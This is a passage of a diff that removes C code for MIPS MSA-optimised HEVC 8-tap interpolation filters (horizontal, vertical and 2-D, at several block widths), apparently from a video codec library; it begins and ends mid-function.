- - mask1 = mask0 + 2; - mask2 = mask0 + 4; - mask3 = mask0 + 6; - mask4 = mask0 + 8; - mask5 = mask0 + 10; - mask6 = mask0 + 12; - mask7 = mask0 + 14; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - for (loop_cnt = height; loop_cnt--;) { - LD_SB2(src, 16, src0, src1); - src2 = LD_SB(src + 24); - src += src_stride; - XORI_B3_128_SB(src0, src1, src2); - - VSHF_B4_SB(src0, src0, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - dst0 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst0, dst0, dst0, dst0); - VSHF_B4_SB(src0, src1, mask4, mask5, mask6, mask7, - vec0, vec1, vec2, vec3); - dst1 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst1, dst1, dst1, dst1); - VSHF_B4_SB(src1, src1, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - dst2 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst2, dst2, dst2, dst2); - VSHF_B4_SB(src2, src2, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - dst3 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst3, dst3, dst3, dst3); - - ST_SH4(dst0, dst1, dst2, dst3, dst, 8); - dst += dst_stride; - } -} - -static void hevc_hz_8t_48w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter, int32_t height) -{ - uint32_t loop_cnt; - v16i8 src0, src1, src2, src3; - v8i16 filt0, filt1, filt2, filt3; - v16i8 mask1, mask2, mask3, mask4, mask5, mask6, mask7; - v16i8 vec0, vec1, vec2, vec3, vec4, vec5; - v8i16 dst0, dst1, dst2, dst3, dst4, dst5; - v8i16 filter_vec, const_vec; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr); - - src -= 3; - filter_vec = LD_SH(filter); - SPLATI_H4_SH(filter_vec, 0, 1, 2, 3, filt0, filt1, filt2, filt3); - - mask1 = mask0 + 2; - mask2 = mask0 + 4; - mask3 = mask0 + 6; - mask4 = mask0 + 8; - mask5 = mask0 + 10; - mask6 = mask0 + 12; - mask7 = mask0 + 14; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - for (loop_cnt = height; loop_cnt--;) { - LD_SB3(src, 16, src0, src1, src2); - src3 = LD_SB(src + 40); - src += src_stride; - XORI_B4_128_SB(src0, src1, src2, src3); - - dst0 = const_vec; - dst1 = const_vec; - dst2 = const_vec; - dst3 = const_vec; - dst4 = const_vec; - dst5 = const_vec; - VSHF_B2_SB(src0, src0, src0, src1, mask0, mask4, vec0, vec1); - VSHF_B2_SB(src1, src1, src1, src2, mask0, mask4, vec2, vec3); - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt0, filt0, filt0, dst0, - dst1, dst2, dst3); - VSHF_B2_SB(src0, src0, src0, src1, mask1, mask5, vec0, vec1); - VSHF_B2_SB(src1, src1, src1, src2, mask1, mask5, vec2, vec3); - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt1, filt1, filt1, filt1, dst0, - dst1, dst2, dst3); - VSHF_B2_SB(src0, src0, src0, src1, mask2, mask6, vec0, vec1); - VSHF_B2_SB(src1, src1, src1, src2, mask2, mask6, vec2, vec3); - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt2, filt2, filt2, filt2, dst0, - dst1, dst2, dst3); - VSHF_B2_SB(src0, src0, src0, src1, mask3, mask7, vec0, vec1); - VSHF_B2_SB(src1, src1, src1, src2, mask3, mask7, vec2, vec3); - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt3, filt3, filt3, filt3, dst0, - dst1, dst2, dst3); - ST_SH4(dst0, dst1, dst2, dst3, dst, 8); - - VSHF_B2_SB(src2, src2, src3, src3, mask0, mask0, vec4, vec5); - DPADD_SB2_SH(vec4, vec5, filt0, filt0, dst4, dst5); - VSHF_B2_SB(src2, src2, src3, src3, mask1, mask1, vec4, vec5); - DPADD_SB2_SH(vec4, vec5, filt1, filt1, dst4, dst5); - VSHF_B2_SB(src2, src2, src3, src3, mask2, mask2, vec4, vec5); - DPADD_SB2_SH(vec4, vec5, filt2, filt2, dst4, dst5); - VSHF_B2_SB(src2, src2, src3, src3, mask3, mask3, vec4, vec5); - DPADD_SB2_SH(vec4, vec5, filt3, filt3, dst4, dst5); - ST_SH2(dst4, dst5, (dst + 32), 8); - dst += dst_stride; - } -} - -static void hevc_hz_8t_64w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter, int32_t height) -{ - uint32_t loop_cnt; - v16i8 src0, src1, src2, src3, src4; - v8i16 filt0, filt1, filt2, filt3; - v16i8 mask1, mask2, mask3, mask4, mask5, mask6, mask7; - v16i8 vec0, vec1, vec2, vec3; - v8i16 dst0, dst1, dst2, dst3, dst4, dst5, dst6, dst7; - v8i16 filter_vec, const_vec; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr); - - src -= 3; - - filter_vec = LD_SH(filter); - SPLATI_H4_SH(filter_vec, 0, 1, 2, 3, filt0, filt1, filt2, filt3); - - mask1 = mask0 + 2; - mask2 = mask0 + 4; - mask3 = mask0 + 6; - mask4 = mask0 + 8; - mask5 = mask0 + 10; - mask6 = mask0 + 12; - mask7 = mask0 + 14; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - for (loop_cnt = height; loop_cnt--;) { - LD_SB4(src, 16, src0, src1, src2, src3); - src4 = LD_SB(src + 56); - src += src_stride; - XORI_B5_128_SB(src0, src1, src2, src3, src4); - - VSHF_B4_SB(src0, src0, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - dst0 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst0, dst0, dst0, dst0); - ST_SH(dst0, dst); - - VSHF_B4_SB(src0, src1, mask4, mask5, mask6, mask7, - vec0, vec1, vec2, vec3); - dst1 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst1, dst1, dst1, dst1); - ST_SH(dst1, dst + 8); - - VSHF_B4_SB(src1, src1, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - dst2 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst2, dst2, dst2, dst2); - ST_SH(dst2, dst + 16); - - VSHF_B4_SB(src1, src2, mask4, mask5, mask6, mask7, - vec0, vec1, vec2, vec3); - dst3 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst3, dst3, dst3, dst3); - ST_SH(dst3, dst + 24); - - VSHF_B4_SB(src2, src2, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - dst4 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst4, dst4, dst4, dst4); - ST_SH(dst4, dst + 32); - - VSHF_B4_SB(src2, src3, mask4, mask5, mask6, mask7, - vec0, vec1, vec2, vec3); - dst5 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst5, dst5, dst5, dst5); - ST_SH(dst5, dst + 40); - - VSHF_B4_SB(src3, src3, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - dst6 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst6, dst6, dst6, dst6); - ST_SH(dst6, dst + 48); - - VSHF_B4_SB(src4, src4, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - dst7 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst7, dst7, dst7, dst7); - ST_SH(dst7, dst + 56); - dst += dst_stride; - } -} - -static void hevc_vt_8t_4w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter, int32_t height) -{ - int32_t loop_cnt; - int32_t res = (height & 0x07) >> 1; - v16i8 src0, src1, src2, src3, src4, src5, src6, src7, src8; - v16i8 src9, src10, src11, src12, src13, src14; - v16i8 src10_r, src32_r, src54_r, src76_r, src98_r; - v16i8 src21_r, src43_r, src65_r, src87_r, src109_r; - v16i8 src1110_r, src1211_r, src1312_r, src1413_r; - v16i8 src2110, src4332, src6554, src8776, src10998; - v16i8 src12111110, src14131312; - v8i16 dst10, dst32, dst54, dst76; - v8i16 filt0, filt1, filt2, filt3; - v8i16 filter_vec, const_vec; - - src -= (3 * src_stride); - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - filter_vec = LD_SH(filter); - SPLATI_H4_SH(filter_vec, 0, 1, 2, 3, filt0, filt1, filt2, filt3); - - LD_SB7(src, src_stride, src0, src1, src2, src3, src4, src5, src6); - src += (7 * src_stride); - ILVR_B4_SB(src1, src0, src3, src2, src5, src4, src2, src1, - src10_r, src32_r, src54_r, src21_r); - ILVR_B2_SB(src4, src3, src6, src5, src43_r, src65_r); - ILVR_D3_SB(src21_r, src10_r, src43_r, src32_r, src65_r, src54_r, - src2110, src4332, src6554); - XORI_B3_128_SB(src2110, src4332, src6554); - - for (loop_cnt = (height >> 3); loop_cnt--;) { - LD_SB8(src, src_stride, - src7, src8, src9, src10, src11, src12, src13, src14); - src += (8 * src_stride); - - ILVR_B4_SB(src7, src6, src8, src7, src9, src8, src10, src9, - src76_r, src87_r, src98_r, src109_r); - ILVR_B4_SB(src11, src10, src12, src11, src13, src12, src14, src13, - src1110_r, src1211_r, src1312_r, src1413_r); - ILVR_D4_SB(src87_r, src76_r, src109_r, src98_r, - src1211_r, src1110_r, src1413_r, src1312_r, - src8776, src10998, src12111110, src14131312); - XORI_B4_128_SB(src8776, src10998, src12111110, src14131312); - - dst10 = const_vec; - DPADD_SB4_SH(src2110, src4332, src6554, src8776, - filt0, filt1, filt2, filt3, dst10, dst10, dst10, dst10); - dst32 = const_vec; - DPADD_SB4_SH(src4332, src6554, src8776, src10998, - filt0, filt1, filt2, filt3, dst32, dst32, dst32, dst32); - dst54 = const_vec; - DPADD_SB4_SH(src6554, src8776, src10998, src12111110, - filt0, filt1, filt2, filt3, dst54, dst54, dst54, dst54); - dst76 = const_vec; - DPADD_SB4_SH(src8776, src10998, src12111110, src14131312, - filt0, filt1, filt2, filt3, dst76, dst76, dst76, dst76); - - ST_D8(dst10, dst32, dst54, dst76, 0, 1, 0, 1, 0, 1, 0, 1, dst, dst_stride); - dst += (8 * dst_stride); - - src2110 = src10998; - src4332 = src12111110; - src6554 = src14131312; - src6 = src14; - } - for (; res--; ) { - LD_SB2(src, src_stride, src7, src8); - src += 2 * src_stride; - ILVR_B2_SB(src7, src6, src8, src7, src76_r, src87_r); - src8776 = (v16i8)__msa_ilvr_d((v2i64) src87_r, src76_r); - src8776 = (v16i8)__msa_xori_b((v16i8) src8776, 128); - dst10 = const_vec; - DPADD_SB4_SH(src2110, src4332, src6554, src8776, - filt0, filt1, filt2, filt3, dst10, dst10, dst10, dst10); - ST_D2(dst10, 0, 1, dst, dst_stride); - dst += 2 * dst_stride; - src2110 = src4332; - src4332 = src6554; - src6554 = src8776; - src6 = src8; - } -} - -static void hevc_vt_8t_8w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter, int32_t height) -{ - int32_t loop_cnt; - v16i8 src0, src1, src2, src3, src4, src5, src6, src7, src8, src9, src10; - v16i8 src10_r, src32_r, src54_r, src76_r, src98_r; - v16i8 src21_r, src43_r, src65_r, src87_r, src109_r; - v8i16 dst0_r, dst1_r, dst2_r, dst3_r; - v8i16 filter_vec, const_vec; - v8i16 filt0, filt1, filt2, filt3; - - src -= (3 * src_stride); - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - filter_vec = LD_SH(filter); - SPLATI_H4_SH(filter_vec, 0, 1, 2, 3, filt0, filt1, filt2, filt3); - - LD_SB7(src, src_stride, src0, src1, src2, src3, src4, src5, src6); - src += (7 * src_stride); - XORI_B7_128_SB(src0, src1, src2, src3, src4, src5, src6); - ILVR_B4_SB(src1, src0, src3, src2, src5, src4, src2, src1, - src10_r, src32_r, src54_r, src21_r); - ILVR_B2_SB(src4, src3, src6, src5, src43_r, src65_r); - - for (loop_cnt = (height >> 2); loop_cnt--;) { - LD_SB4(src, src_stride, src7, src8, src9, src10); - src += (4 * src_stride); - XORI_B4_128_SB(src7, src8, src9, src10); - ILVR_B4_SB(src7, src6, src8, src7, src9, src8, src10, src9, - src76_r, src87_r, src98_r, src109_r); - - dst0_r = const_vec; - DPADD_SB4_SH(src10_r, src32_r, src54_r, src76_r, - filt0, filt1, filt2, filt3, - dst0_r, dst0_r, dst0_r, dst0_r); - dst1_r = const_vec; - DPADD_SB4_SH(src21_r, src43_r, src65_r, src87_r, - filt0, filt1, filt2, filt3, - dst1_r, dst1_r, dst1_r, dst1_r); - dst2_r = const_vec; - DPADD_SB4_SH(src32_r, src54_r, src76_r, src98_r, - filt0, filt1, filt2, filt3, - dst2_r, dst2_r, dst2_r, dst2_r); - dst3_r = const_vec; - DPADD_SB4_SH(src43_r, src65_r, src87_r, src109_r, - filt0, filt1, filt2, filt3, - dst3_r, dst3_r, dst3_r, dst3_r); - - ST_SH4(dst0_r, dst1_r, dst2_r, dst3_r, dst, dst_stride); - dst += (4 * dst_stride); - - src10_r = src54_r; - src32_r = src76_r; - src54_r = src98_r; - src21_r = src65_r; - src43_r = src87_r; - src65_r = src109_r; - src6 = src10; - } -} - -static void hevc_vt_8t_12w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter, int32_t height) -{ - int32_t loop_cnt; - v16i8 src0, src1, src2, src3, src4, src5, src6, src7, src8, src9, src10; - v16i8 src10_r, src32_r, src54_r, src76_r, src98_r; - v16i8 src21_r, src43_r, src65_r, src87_r, src109_r; - v8i16 dst0_r, dst1_r, dst2_r, dst3_r; - v16i8 src10_l, src32_l, src54_l, src76_l, src98_l; - v16i8 src21_l, src43_l, src65_l, src87_l, src109_l; - v16i8 src2110, src4332, src6554, src8776, src10998; - v8i16 dst0_l, dst1_l; - v8i16 filter_vec, const_vec; - v8i16 filt0, filt1, filt2, filt3; - - src -= (3 * src_stride); - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - filter_vec = LD_SH(filter); - SPLATI_H4_SH(filter_vec, 0, 1, 2, 3, filt0, filt1, filt2, filt3); - - LD_SB7(src, src_stride, src0, src1, src2, src3, src4, src5, src6); - src += (7 * src_stride); - XORI_B7_128_SB(src0, src1, src2, src3, src4, src5, src6); - ILVR_B4_SB(src1, src0, src3, src2, src5, src4, src2, src1, - src10_r, src32_r, src54_r, src21_r); - ILVR_B2_SB(src4, src3, src6, src5, src43_r, src65_r); - ILVL_B4_SB(src1, src0, src3, src2, src5, src4, src2, src1, - src10_l, src32_l, src54_l, src21_l); - ILVL_B2_SB(src4, src3, src6, src5, src43_l, src65_l); - ILVR_D3_SB(src21_l, src10_l, src43_l, src32_l, src65_l, src54_l, - src2110, src4332, src6554); - - for (loop_cnt = (height >> 2); loop_cnt--;) { - LD_SB4(src, src_stride, src7, src8, src9, src10); - src += (4 * src_stride); - XORI_B4_128_SB(src7, src8, src9, src10); - ILVR_B4_SB(src7, src6, src8, src7, src9, src8, src10, src9, - src76_r, src87_r, src98_r, src109_r); - ILVL_B4_SB(src7, src6, src8, src7, src9, src8, src10, src9, - src76_l, src87_l, src98_l, src109_l); - ILVR_D2_SB(src87_l, src76_l, src109_l, src98_l, src8776, src10998); - - dst0_r = const_vec; - DPADD_SB4_SH(src10_r, src32_r, src54_r, src76_r, - filt0, filt1, filt2, filt3, - dst0_r, dst0_r, dst0_r, dst0_r); - dst1_r = const_vec; - DPADD_SB4_SH(src21_r, src43_r, src65_r, src87_r, - filt0, filt1, filt2, filt3, - dst1_r, dst1_r, dst1_r, dst1_r); - dst2_r = const_vec; - DPADD_SB4_SH(src32_r, src54_r, src76_r, src98_r, - filt0, filt1, filt2, filt3, - dst2_r, dst2_r, dst2_r, dst2_r); - dst3_r = const_vec; - DPADD_SB4_SH(src43_r, src65_r, src87_r, src109_r, - filt0, filt1, filt2, filt3, - dst3_r, dst3_r, dst3_r, dst3_r); - dst0_l = const_vec; - DPADD_SB4_SH(src2110, src4332, src6554, src8776, - filt0, filt1, filt2, filt3, - dst0_l, dst0_l, dst0_l, dst0_l); - dst1_l = const_vec; - DPADD_SB4_SH(src4332, src6554, src8776, src10998, - filt0, filt1, filt2, filt3, - dst1_l, dst1_l, dst1_l, dst1_l); - - ST_SH4(dst0_r, dst1_r, dst2_r, dst3_r, dst, dst_stride); - ST_D4(dst0_l, dst1_l, 0, 1, 0, 1, dst + 8, dst_stride); - dst += (4 * dst_stride); - - src10_r = src54_r; - src32_r = src76_r; - src54_r = src98_r; - src21_r = src65_r; - src43_r = src87_r; - src65_r = src109_r; - src2110 = src6554; - src4332 = src8776; - src6554 = src10998; - src6 = src10; - } -} - -static void hevc_vt_8t_16multx4mult_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - int32_t height, - int32_t width) -{ - const uint8_t *src_tmp; - int16_t *dst_tmp; - int32_t loop_cnt, cnt; - v16i8 src0, src1, src2, src3, src4, src5, src6, src7, src8, src9, src10; - v16i8 src10_r, src32_r, src54_r, src76_r, src98_r; - v16i8 src21_r, src43_r, src65_r, src87_r, src109_r; - v8i16 dst0_r, dst1_r, dst2_r, dst3_r; - v16i8 src10_l, src32_l, src54_l, src76_l, src98_l; - v16i8 src21_l, src43_l, src65_l, src87_l, src109_l; - v8i16 dst0_l, dst1_l, dst2_l, dst3_l; - v8i16 filter_vec, const_vec; - v8i16 filt0, filt1, filt2, filt3; - - src -= (3 * src_stride); - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - filter_vec = LD_SH(filter); - SPLATI_H4_SH(filter_vec, 0, 1, 2, 3, filt0, filt1, filt2, filt3); - - for (cnt = width >> 4; cnt--;) { - src_tmp = src; - dst_tmp = dst; - - LD_SB7(src_tmp, src_stride, src0, src1, src2, src3, src4, src5, src6); - src_tmp += (7 * src_stride); - XORI_B7_128_SB(src0, src1, src2, src3, src4, src5, src6); - ILVR_B4_SB(src1, src0, src3, src2, src5, src4, src2, src1, - src10_r, src32_r, src54_r, src21_r); - ILVR_B2_SB(src4, src3, src6, src5, src43_r, src65_r); - ILVL_B4_SB(src1, src0, src3, src2, src5, src4, src2, src1, - src10_l, src32_l, src54_l, src21_l); - ILVL_B2_SB(src4, src3, src6, src5, src43_l, src65_l); - - for (loop_cnt = (height >> 2); loop_cnt--;) { - LD_SB4(src_tmp, src_stride, src7, src8, src9, src10); - src_tmp += (4 * src_stride); - XORI_B4_128_SB(src7, src8, src9, src10); - ILVR_B4_SB(src7, src6, src8, src7, src9, src8, src10, src9, - src76_r, src87_r, src98_r, src109_r); - ILVL_B4_SB(src7, src6, src8, src7, src9, src8, src10, src9, - src76_l, src87_l, src98_l, src109_l); - - dst0_r = const_vec; - DPADD_SB4_SH(src10_r, src32_r, src54_r, src76_r, - filt0, filt1, filt2, filt3, - dst0_r, dst0_r, dst0_r, dst0_r); - dst1_r = const_vec; - DPADD_SB4_SH(src21_r, src43_r, src65_r, src87_r, - filt0, filt1, filt2, filt3, - dst1_r, dst1_r, dst1_r, dst1_r); - dst2_r = const_vec; - DPADD_SB4_SH(src32_r, src54_r, src76_r, src98_r, - filt0, filt1, filt2, filt3, - dst2_r, dst2_r, dst2_r, dst2_r); - dst3_r = const_vec; - DPADD_SB4_SH(src43_r, src65_r, src87_r, src109_r, - filt0, filt1, filt2, filt3, - dst3_r, dst3_r, dst3_r, dst3_r); - dst0_l = const_vec; - DPADD_SB4_SH(src10_l, src32_l, src54_l, src76_l, - filt0, filt1, filt2, filt3, - dst0_l, dst0_l, dst0_l, dst0_l); - dst1_l = const_vec; - DPADD_SB4_SH(src21_l, src43_l, src65_l, src87_l, - filt0, filt1, filt2, filt3, - dst1_l, dst1_l, dst1_l, dst1_l); - dst2_l = const_vec; - DPADD_SB4_SH(src32_l, src54_l, src76_l, src98_l, - filt0, filt1, filt2, filt3, - dst2_l, dst2_l, dst2_l, dst2_l); - dst3_l = const_vec; - DPADD_SB4_SH(src43_l, src65_l, src87_l, src109_l, - filt0, filt1, filt2, filt3, - dst3_l, dst3_l, dst3_l, dst3_l); - - ST_SH4(dst0_r, dst1_r, dst2_r, dst3_r, dst_tmp, dst_stride); - ST_SH4(dst0_l, dst1_l, dst2_l, dst3_l, dst_tmp + 8, dst_stride); - dst_tmp += (4 * dst_stride); - - src10_r = src54_r; - src32_r = src76_r; - src54_r = src98_r; - src21_r = src65_r; - src43_r = src87_r; - src65_r = src109_r; - src10_l = src54_l; - src32_l = src76_l; - src54_l = src98_l; - src21_l = src65_l; - src43_l = src87_l; - src65_l = src109_l; - src6 = src10; - } - - src += 16; - dst += 16; - } -} - -static void hevc_vt_8t_16w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter, int32_t height) -{ - hevc_vt_8t_16multx4mult_msa(src, src_stride, dst, dst_stride, - filter, height, 16); -} - -static void hevc_vt_8t_24w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter, int32_t height) -{ - hevc_vt_8t_16multx4mult_msa(src, src_stride, dst, dst_stride, - filter, height, 16); - hevc_vt_8t_8w_msa(src + 16, src_stride, dst + 16, dst_stride, - filter, height); -} - -static void hevc_vt_8t_32w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter, int32_t height) -{ - hevc_vt_8t_16multx4mult_msa(src, src_stride, dst, dst_stride, - filter, height, 32); -} - -static void hevc_vt_8t_48w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter, int32_t height) -{ - hevc_vt_8t_16multx4mult_msa(src, src_stride, dst, dst_stride, - filter, height, 48); -} - -static void hevc_vt_8t_64w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter, int32_t height) -{ - hevc_vt_8t_16multx4mult_msa(src, src_stride, dst, dst_stride, - filter, height, 64); -} - -static void hevc_hv_8t_4w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter_x, const int8_t *filter_y, - int32_t height) -{ - uint32_t loop_cnt; - v16i8 src0, src1, src2, src3, src4, src5, src6, src7, src8, src9, src10; - v8i16 filt0, filt1, filt2, filt3; - v8i16 filt_h0, filt_h1, filt_h2, filt_h3; - v16i8 mask1, mask2, mask3; - v8i16 filter_vec, const_vec; - v16i8 vec0, vec1, vec2, vec3, vec4, vec5, vec6, vec7; - v16i8 vec8, vec9, vec10, vec11, vec12, vec13, vec14, vec15; - v8i16 dst30, dst41, dst52, dst63, dst66, dst97, dst108; - v4i32 dst0_r, dst1_r, dst2_r, dst3_r; - v8i16 dst10_r, dst32_r, dst54_r, dst76_r, dst98_r; - v8i16 dst21_r, dst43_r, dst65_r, dst87_r, dst109_r; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr + 16); - - src -= ((3 * src_stride) + 3); - filter_vec = LD_SH(filter_x); - SPLATI_H4_SH(filter_vec, 0, 1, 2, 3, filt0, filt1, filt2, filt3); - - filter_vec = LD_SH(filter_y); - UNPCK_R_SB_SH(filter_vec, filter_vec); - - SPLATI_W4_SH(filter_vec, filt_h0, filt_h1, filt_h2, filt_h3); - - mask1 = mask0 + 2; - mask2 = mask0 + 4; - mask3 = mask0 + 6; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - LD_SB7(src, src_stride, src0, src1, src2, src3, src4, src5, src6); - src += (7 * src_stride); - XORI_B7_128_SB(src0, src1, src2, src3, src4, src5, src6); - - VSHF_B4_SB(src0, src3, mask0, mask1, mask2, mask3, vec0, vec1, vec2, vec3); - VSHF_B4_SB(src1, src4, mask0, mask1, mask2, mask3, vec4, vec5, vec6, vec7); - VSHF_B4_SB(src2, src5, mask0, mask1, mask2, mask3, - vec8, vec9, vec10, vec11); - VSHF_B4_SB(src3, src6, mask0, mask1, mask2, mask3, - vec12, vec13, vec14, vec15); - dst30 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst30, dst30, dst30, dst30); - dst41 = const_vec; - DPADD_SB4_SH(vec4, vec5, vec6, vec7, filt0, filt1, filt2, filt3, - dst41, dst41, dst41, dst41); - dst52 = const_vec; - DPADD_SB4_SH(vec8, vec9, vec10, vec11, filt0, filt1, filt2, filt3, - dst52, dst52, dst52, dst52); - dst63 = const_vec; - DPADD_SB4_SH(vec12, vec13, vec14, vec15, filt0, filt1, filt2, filt3, - dst63, dst63, dst63, dst63); - - ILVRL_H2_SH(dst41, dst30, dst10_r, dst43_r); - ILVRL_H2_SH(dst52, dst41, dst21_r, dst54_r); - ILVRL_H2_SH(dst63, dst52, dst32_r, dst65_r); - dst66 = (v8i16) __msa_splati_d((v2i64) dst63, 1); - - for (loop_cnt = height >> 2; loop_cnt--;) { - LD_SB4(src, src_stride, src7, src8, src9, src10); - src += (4 * src_stride); - XORI_B4_128_SB(src7, src8, src9, src10); - - VSHF_B4_SB(src7, src9, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - VSHF_B4_SB(src8, src10, mask0, mask1, mask2, mask3, - vec4, vec5, vec6, vec7); - dst97 = const_vec; - dst108 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst97, dst97, dst97, dst97); - DPADD_SB4_SH(vec4, vec5, vec6, vec7, filt0, filt1, filt2, filt3, - dst108, dst108, dst108, dst108); - - dst76_r = __msa_ilvr_h(dst97, dst66); - ILVRL_H2_SH(dst108, dst97, dst87_r, dst109_r); - dst66 = (v8i16) __msa_splati_d((v2i64) dst97, 1); - dst98_r = __msa_ilvr_h(dst66, dst108); - - dst0_r = HEVC_FILT_8TAP(dst10_r, dst32_r, dst54_r, dst76_r, - filt_h0, filt_h1, filt_h2, filt_h3); - dst1_r = HEVC_FILT_8TAP(dst21_r, dst43_r, dst65_r, dst87_r, - filt_h0, filt_h1, filt_h2, filt_h3); - dst2_r = HEVC_FILT_8TAP(dst32_r, dst54_r, dst76_r, dst98_r, - filt_h0, filt_h1, filt_h2, filt_h3); - dst3_r = HEVC_FILT_8TAP(dst43_r, dst65_r, dst87_r, dst109_r, - filt_h0, filt_h1, filt_h2, filt_h3); - SRA_4V(dst0_r, dst1_r, dst2_r, dst3_r, 6); - PCKEV_H2_SW(dst1_r, dst0_r, dst3_r, dst2_r, dst0_r, dst2_r); - ST_D4(dst0_r, dst2_r, 0, 1, 0, 1, dst, dst_stride); - dst += (4 * dst_stride); - - dst10_r = dst54_r; - dst32_r = dst76_r; - dst54_r = dst98_r; - dst21_r = dst65_r; - dst43_r = dst87_r; - dst65_r = dst109_r; - dst66 = (v8i16) __msa_splati_d((v2i64) dst108, 1); - } -} - -static void hevc_hv_8t_8multx1mult_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter_x, - const int8_t *filter_y, - int32_t height, int32_t width) -{ - uint32_t loop_cnt, cnt; - const uint8_t *src_tmp; - int16_t *dst_tmp; - v16i8 src0, src1, src2, src3, src4, src5, src6, src7; - v8i16 filt0, filt1, filt2, filt3; - v8i16 filt_h0, filt_h1, filt_h2, filt_h3; - v16i8 mask1, mask2, mask3; - v8i16 filter_vec, const_vec; - v16i8 vec0, vec1, vec2, vec3, vec4, vec5, vec6, vec7; - v16i8 vec8, vec9, vec10, vec11, vec12, vec13, vec14, vec15; - v8i16 dst0, dst1, dst2, dst3, dst4, dst5, dst6, dst7; - v4i32 dst0_r, dst0_l; - v8i16 dst10_r, dst32_r, dst54_r, dst76_r; - v8i16 dst10_l, dst32_l, dst54_l, dst76_l; - v16i8 mask0 = { 0, 1, 1, 2, 2, 3, 3, 4, 4, 5, 5, 6, 6, 7, 7, 8 }; - - src -= ((3 * src_stride) + 3); - filter_vec = LD_SH(filter_x); - SPLATI_H4_SH(filter_vec, 0, 1, 2, 3, filt0, filt1, filt2, filt3); - - filter_vec = LD_SH(filter_y); - UNPCK_R_SB_SH(filter_vec, filter_vec); - - SPLATI_W4_SH(filter_vec, filt_h0, filt_h1, filt_h2, filt_h3); - - mask1 = mask0 + 2; - mask2 = mask0 + 4; - mask3 = mask0 + 6; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - for (cnt = width >> 3; cnt--;) { - src_tmp = src; - dst_tmp = dst; - - LD_SB7(src_tmp, src_stride, src0, src1, src2, src3, src4, src5, src6); - src_tmp += (7 * src_stride); - XORI_B7_128_SB(src0, src1, src2, src3, src4, src5, src6); - - /* row 0 row 1 row 2 row 3 */ - VSHF_B4_SB(src0, src0, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - VSHF_B4_SB(src1, src1, mask0, mask1, mask2, mask3, - vec4, vec5, vec6, vec7); - VSHF_B4_SB(src2, src2, mask0, mask1, mask2, mask3, - vec8, vec9, vec10, vec11); - VSHF_B4_SB(src3, src3, mask0, mask1, mask2, mask3, - vec12, vec13, vec14, vec15); - dst0 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst0, dst0, dst0, dst0); - dst1 = const_vec; - 